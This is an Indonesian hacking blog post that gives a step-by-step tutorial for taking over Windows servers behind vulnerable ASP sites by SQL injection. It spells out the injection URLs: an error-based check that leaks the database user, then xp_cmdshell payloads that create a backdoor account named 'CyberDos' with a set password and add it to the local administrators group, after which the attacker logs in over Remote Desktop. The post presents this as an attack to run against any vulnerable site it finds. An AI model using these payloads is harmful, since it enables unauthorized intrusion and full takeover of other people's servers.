-=We can do all you can't do=-
Your Ad Here

Sabtu, 05 Desember 2009

Diposting oleh Abdul Rachman

ini tentang bagaimana caranya rooting (ambil alih/remote desktop) server via sql injection (asp seh..hehehe..)
tapi maaf yaa..cuma bisa kasih tutorial’a doang.. 1

yang harus dilakukan :
1. cari website yang vuln (asp)
contoh : http://target.com/bego.asp?id=27

2. kita cek vuln’a seperti ini
contoh : http://target.com/bego.asp?id=convert(int,(select+user));–
klo errornya seperti ini
Syntax error converting blablabla value ‘dbo‘ to a column of data type int.
perhatiin yang diberi warna merah itu..klo ada tulisan seperti itu,,kita lanjut..klo tidak?? ya cebok 10

3. lalu lanjutkan seperti ini neh exploitnya.. 4
contoh : http://target.com/bego.asp?id=27;exec%20master..xp_cmdshell’net user CyberDos cyborg /add’;–
fungsinya? tuk membuat account baru pada desktop target dengan username CyberDos dan password cyborg

4. langkah sebelum terakhir
contoh : http://target.com/bego.asp?id=27;exec%20master..xp_cmdshell ‘net localgroup administrators CyberDos /add’;–
fungsinya? tuk menjadikan account kita menjadi administrator di dekstop target 4

5. ya tinggal gunain Remote Desktop deh dengan acc dan pass masing2 juga 4

Sumber : http://www.cyberdos.org

edit post

0 komentar:

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))

Posting Komentar

Label